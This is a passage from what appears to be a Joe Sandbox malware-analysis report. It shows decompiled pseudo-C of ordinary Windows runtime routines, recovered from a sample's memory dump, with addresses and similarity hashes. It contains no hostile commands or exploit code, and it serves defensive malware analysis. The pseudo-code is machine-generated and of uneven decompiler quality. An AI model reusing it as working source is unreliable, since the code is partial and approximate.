                                                                                                            0x010cc01e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010cc02d
                                                                                                            0x010800d5
                                                                                                            0x010800d9
                                                                                                            0x010cc03d
                                                                                                            0x010cc046
                                                                                                            0x010cc046
                                                                                                            0x010800df
                                                                                                            0x010800e2
                                                                                                            0x010800ea
                                                                                                            0x010800ef
                                                                                                            0x010800f2
                                                                                                            0x010800f6
                                                                                                            0x01080111
                                                                                                            0x01080117
                                                                                                            0x01080117
                                                                                                            0x00000000
                                                                                                            0x010800f6
                                                                                                            0x010800d0
                                                                                                            0x010800d0
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e93227b3a0291c7775414f17131f9bf8fd5d2e5cb2e1eb9f6901d165234a8d35
                                                                                                            • Instruction ID: 011d7b16eed1152ccc083d2725328e79e3bef31efe2587de6baabcd573d7b40e
                                                                                                            • Opcode Fuzzy Hash: e93227b3a0291c7775414f17131f9bf8fd5d2e5cb2e1eb9f6901d165234a8d35
                                                                                                            • Instruction Fuzzy Hash: 7031AE31201B04CFDB66DB28C940B9AB7E5FF88714F1445ADF5DA87694DB35A806CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E6C0A Relevance: .1, Instructions: 79COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E010E6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01087D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1157b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01084620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E010AF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01087D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E010A9AE0();
						_t23 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                            0x010e6c0a
                                                                                                            0x010e6c0f
                                                                                                            0x010e6c10
                                                                                                            0x010e6c13
                                                                                                            0x010e6c15
                                                                                                            0x010e6c19
                                                                                                            0x010e6c1c
                                                                                                            0x010e6c21
                                                                                                            0x010e6c28
                                                                                                            0x010e6c3a
                                                                                                            0x010e6c2a
                                                                                                            0x010e6c33
                                                                                                            0x010e6c33
                                                                                                            0x010e6c3f
                                                                                                            0x010e6c48
                                                                                                            0x010e6c4d
                                                                                                            0x010e6c60
                                                                                                            0x010e6c65
                                                                                                            0x010e6c69
                                                                                                            0x010e6c73
                                                                                                            0x010e6c79
                                                                                                            0x010e6c7f
                                                                                                            0x010e6c86
                                                                                                            0x010e6c90
                                                                                                            0x010e6c94
                                                                                                            0x010e6ca6
                                                                                                            0x010e6cb2
                                                                                                            0x010e6cbd
                                                                                                            0x010e6cbd
                                                                                                            0x010e6cc3
                                                                                                            0x010e6cc7
                                                                                                            0x010e6ccb
                                                                                                            0x010e6cd0
                                                                                                            0x010e6cd1
                                                                                                            0x010e6ce2
                                                                                                            0x010e6ce2
                                                                                                            0x010e6c69
                                                                                                            0x010e6ced

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7d469ffa320847b5260a5dcec6c1e86496d82b50d6587805e5ce18cf2a2f50fd
                                                                                                            • Instruction ID: af6ed00f63dede2c8b7f9a1c9e1c2ba03c50982c44a75a5dcac8220b88633677
                                                                                                            • Opcode Fuzzy Hash: 7d469ffa320847b5260a5dcec6c1e86496d82b50d6587805e5ce18cf2a2f50fd
                                                                                                            • Instruction Fuzzy Hash: D021CA72A00649AFD711EF69D884E6AB7F8FF18300F1440A9F988C7790D635E950CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A90AF Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E010A90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E010BD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0109E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01084620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E010AF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0109A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                            0x010a90af
                                                                                                            0x010a90b8
                                                                                                            0x010a90bb
                                                                                                            0x010a90bf
                                                                                                            0x010a90c2
                                                                                                            0x010a90c2
                                                                                                            0x010a90c8
                                                                                                            0x010a90cb
                                                                                                            0x010a90cd
                                                                                                            0x010e14d7
                                                                                                            0x010e14eb
                                                                                                            0x010e14eb
                                                                                                            0x00000000
                                                                                                            0x010e14eb
                                                                                                            0x010e14db
                                                                                                            0x010e14e6
                                                                                                            0x00000000
                                                                                                            0x010e14f2
                                                                                                            0x010e14e8
                                                                                                            0x00000000
                                                                                                            0x010e14e8
                                                                                                            0x010a90d8
                                                                                                            0x010a90da
                                                                                                            0x010a90dd
                                                                                                            0x010a90e5
                                                                                                            0x00000000
                                                                                                            0x010a9139
                                                                                                            0x010a90fa
                                                                                                            0x010a90fe
                                                                                                            0x010a9142
                                                                                                            0x00000000
                                                                                                            0x010a9142
                                                                                                            0x010a9104
                                                                                                            0x010a9107
                                                                                                            0x010a910b
                                                                                                            0x010a9110
                                                                                                            0x010a9118
                                                                                                            0x010a9147
                                                                                                            0x010a9148
                                                                                                            0x010a914f
                                                                                                            0x010a9150
                                                                                                            0x010a9151
                                                                                                            0x010a9152
                                                                                                            0x010a9156
                                                                                                            0x010a915d
                                                                                                            0x010a9160
                                                                                                            0x010a9168
                                                                                                            0x010a916c
                                                                                                            0x010a91bc
                                                                                                            0x010a91be
                                                                                                            0x00000000
                                                                                                            0x010a91be
                                                                                                            0x010a916e
                                                                                                            0x010a9173
                                                                                                            0x010a9176
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a917c
                                                                                                            0x010a9180
                                                                                                            0x010a91b5
                                                                                                            0x00000000
                                                                                                            0x010a91b5
                                                                                                            0x010a9182
                                                                                                            0x010a9185
                                                                                                            0x010a9189
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a918e
                                                                                                            0x010a9190
                                                                                                            0x010a9198
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a91a0
                                                                                                            0x00000000
                                                                                                            0x010a91ad
                                                                                                            0x010a91ad
                                                                                                            0x010a91b0
                                                                                                            0x010a91b1
                                                                                                            0x00000000
                                                                                                            0x010a9185
                                                                                                            0x010a911a
                                                                                                            0x010a911c
                                                                                                            0x010a911f
                                                                                                            0x010a9125
                                                                                                            0x010a9127
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                            • Instruction ID: 8dc17e37ddb617a9569a3baa9e5aef1b8c626c1a818e9510691cfd06306d076f
                                                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                            • Instruction Fuzzy Hash: 3C2165B5A00205EFDB61DF99C444E9AFBF8EB54354F14846EE9C59B210D770ED50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01093B7A Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E01093B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x11584c4; // 0x0
				_v12 = 1;
				_v8 =  *0x11584c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x11584c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E010AAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E010AFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x11584c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x11584c4; // 0x0
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                            0x01093b89
                                                                                                            0x01093b96
                                                                                                            0x01093ba1
                                                                                                            0x01093bab
                                                                                                            0x01093bb5
                                                                                                            0x01093bb9
                                                                                                            0x010d6298
                                                                                                            0x01093bbf
                                                                                                            0x01093bc2
                                                                                                            0x01093bc3
                                                                                                            0x01093bc9
                                                                                                            0x01093bca
                                                                                                            0x01093bcc
                                                                                                            0x01093bcd
                                                                                                            0x01093bd4
                                                                                                            0x01093bd6
                                                                                                            0x01093bdb
                                                                                                            0x01093bea
                                                                                                            0x01093bf7
                                                                                                            0x01093bfb
                                                                                                            0x01093bff
                                                                                                            0x01093c09
                                                                                                            0x01093c0a
                                                                                                            0x01093c0b
                                                                                                            0x01093c0f
                                                                                                            0x01093c14
                                                                                                            0x01093c18
                                                                                                            0x01093c18
                                                                                                            0x01093bfb
                                                                                                            0x01093c1b
                                                                                                            0x01093c30
                                                                                                            0x01093c30
                                                                                                            0x01093c3d

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8a57986db838ec11250ab2407a2c10267efaaa968801cbaac712a2a5df4fe9b
                                                                                                            • Instruction ID: a1220fb7393a979840fc76f48cdf5b1b92190744ac274efa05a90b9112ca4728
                                                                                                            • Opcode Fuzzy Hash: b8a57986db838ec11250ab2407a2c10267efaaa968801cbaac712a2a5df4fe9b
                                                                                                            • Instruction Fuzzy Hash: 022192B2600609EFCB14DF98CD91BAABBBDFB44708F150068EA44AB251D771ED51DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E6CF0 Relevance: .1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E010E6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01087D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01087D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1045c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0109F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0109F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E010E7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01082400( &_v52);
								}
								_t21 = L01082400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                            0x010e6cfb
                                                                                                            0x010e6d00
                                                                                                            0x010e6d02
                                                                                                            0x010e6d06
                                                                                                            0x010e6d0a
                                                                                                            0x010e6d0e
                                                                                                            0x010e6d19
                                                                                                            0x010e6d2b
                                                                                                            0x010e6d1b
                                                                                                            0x010e6d24
                                                                                                            0x010e6d24
                                                                                                            0x010e6d33
                                                                                                            0x010e6d39
                                                                                                            0x010e6d46
                                                                                                            0x010e6d4f
                                                                                                            0x010e6d61
                                                                                                            0x010e6d51
                                                                                                            0x010e6d5a
                                                                                                            0x010e6d5a
                                                                                                            0x010e6d69
                                                                                                            0x010e6d6b
                                                                                                            0x010e6d6d
                                                                                                            0x010e6d6f
                                                                                                            0x010e6d6f
                                                                                                            0x010e6d74
                                                                                                            0x010e6d79
                                                                                                            0x010e6d7a
                                                                                                            0x010e6d7f
                                                                                                            0x010e6d82
                                                                                                            0x010e6d88
                                                                                                            0x010e6d89
                                                                                                            0x010e6d90
                                                                                                            0x010e6d94
                                                                                                            0x010e6da7
                                                                                                            0x010e6db1
                                                                                                            0x010e6db1
                                                                                                            0x010e6dbb
                                                                                                            0x010e6dbb
                                                                                                            0x010e6d90
                                                                                                            0x010e6d69
                                                                                                            0x010e6d46
                                                                                                            0x010e6dc6

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d76ec4b3201678ba5d2e0aac5aa6c74bd823b0496ba4b8fb97868cd4d3edc53b
                                                                                                            • Instruction ID: dbf7ed28316954ed14e4a4edd3740413b884a36cf7c1878e1f9d9d446a8a4d06
                                                                                                            • Opcode Fuzzy Hash: d76ec4b3201678ba5d2e0aac5aa6c74bd823b0496ba4b8fb97868cd4d3edc53b
                                                                                                            • Instruction Fuzzy Hash: 0C2128728087499FD711FF2ED948B9BBBECAFA1240F440496FAC0C7251D732C548C6A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0113070D Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0113070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E011307DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0112AFDE( &_v8,  &_v12);
					E01131293(_t38, _v28, _t60);
					if(E01087D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E011214FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                            0x0113071b
                                                                                                            0x01130724
                                                                                                            0x01130734
                                                                                                            0x01130738
                                                                                                            0x0113074b
                                                                                                            0x0113074b
                                                                                                            0x01130753
                                                                                                            0x01130753
                                                                                                            0x01130759
                                                                                                            0x0113075d
                                                                                                            0x01130774
                                                                                                            0x01130779
                                                                                                            0x0113077d
                                                                                                            0x01130789
                                                                                                            0x01130795
                                                                                                            0x011307a7
                                                                                                            0x01130797
                                                                                                            0x011307a0
                                                                                                            0x011307a0
                                                                                                            0x011307af
                                                                                                            0x011307c4
                                                                                                            0x011307cd
                                                                                                            0x011307cd
                                                                                                            0x011307af
                                                                                                            0x011307dc

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                            • Instruction ID: 27a1ea120698e923d064d39f21b9ee369da3d8fe68c42da2239099a1a7b7ce61
                                                                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                            • Instruction Fuzzy Hash: 27212636204600AFD71ADF5CC884FAABBE5EFD4350F048569F9958B389D730D919CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E7794 Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E010E7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1157b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E010AF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01087D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E010A9AE0();
					_t24 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                            0x010e7799
                                                                                                            0x010e779a
                                                                                                            0x010e779b
                                                                                                            0x010e77a3
                                                                                                            0x010e77ab
                                                                                                            0x010e77ae
                                                                                                            0x010e77b1
                                                                                                            0x010e77b1
                                                                                                            0x010e77bf
                                                                                                            0x010e77c4
                                                                                                            0x010e77c8
                                                                                                            0x010e77ce
                                                                                                            0x010e77d4
                                                                                                            0x010e77e0
                                                                                                            0x010e77e0
                                                                                                            0x010e77d6
                                                                                                            0x010e77d6
                                                                                                            0x010e77de
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010e77de
                                                                                                            0x010e77e5
                                                                                                            0x010e77f0
                                                                                                            0x010e77f3
                                                                                                            0x010e77f6
                                                                                                            0x010e77fd
                                                                                                            0x010e7800
                                                                                                            0x010e780c
                                                                                                            0x010e7818
                                                                                                            0x010e782b
                                                                                                            0x010e781a
                                                                                                            0x010e7823
                                                                                                            0x010e7823
                                                                                                            0x010e7830
                                                                                                            0x010e7831
                                                                                                            0x010e7838
                                                                                                            0x010e783d
                                                                                                            0x010e783e
                                                                                                            0x010e784f
                                                                                                            0x010e784f
                                                                                                            0x010e785a

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c17cf222621180e654f22efc080372bf18b00d34edbba2be8cb205b9708cdc0e
                                                                                                            • Instruction ID: 85c9eb2d92a9154faafad57522797801309bd48ee44c78da2e5b93782cc64bce
                                                                                                            • Opcode Fuzzy Hash: c17cf222621180e654f22efc080372bf18b00d34edbba2be8cb205b9708cdc0e
                                                                                                            • Instruction Fuzzy Hash: 60219F72500604AFC725DF69D894EABBBE8EF58740F10456DE68AC7650D634E900CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108AE73 Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E0108AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01087D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01087D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01087D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01087D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E010E7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                            0x0108ae78
                                                                                                            0x0108ae7c
                                                                                                            0x0108ae7e
                                                                                                            0x0108ae81
                                                                                                            0x0108ae86
                                                                                                            0x0108ae8d
                                                                                                            0x010d2691
                                                                                                            0x0108ae93
                                                                                                            0x0108ae93
                                                                                                            0x0108ae93
                                                                                                            0x0108ae98
                                                                                                            0x0108ae9d
                                                                                                            0x010d26a2
                                                                                                            0x010d26b4
                                                                                                            0x010d26a4
                                                                                                            0x010d26ad
                                                                                                            0x010d26ad
                                                                                                            0x010d26b9
                                                                                                            0x00000000
                                                                                                            0x010d26bb
                                                                                                            0x00000000
                                                                                                            0x010d26bb
                                                                                                            0x0108aea3
                                                                                                            0x0108aea3
                                                                                                            0x0108aea3
                                                                                                            0x0108aeaa
                                                                                                            0x010d26c0
                                                                                                            0x010d26c9
                                                                                                            0x010d26c9
                                                                                                            0x0108aeb3
                                                                                                            0x010d26d4
                                                                                                            0x010d26e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d26e7
                                                                                                            0x010d26ee
                                                                                                            0x010d26f0
                                                                                                            0x010d26f9
                                                                                                            0x010d26f9
                                                                                                            0x010d2702
                                                                                                            0x010d2708
                                                                                                            0x010d2708
                                                                                                            0x010d270b
                                                                                                            0x010d270f
                                                                                                            0x010d2711
                                                                                                            0x010d2711
                                                                                                            0x010d2725
                                                                                                            0x010d2725
                                                                                                            0x00000000
                                                                                                            0x0108aeb9
                                                                                                            0x0108aeb9
                                                                                                            0x0108aebf
                                                                                                            0x0108aebf
                                                                                                            0x0108aeb3

                                                                                                            Memory Dump Source
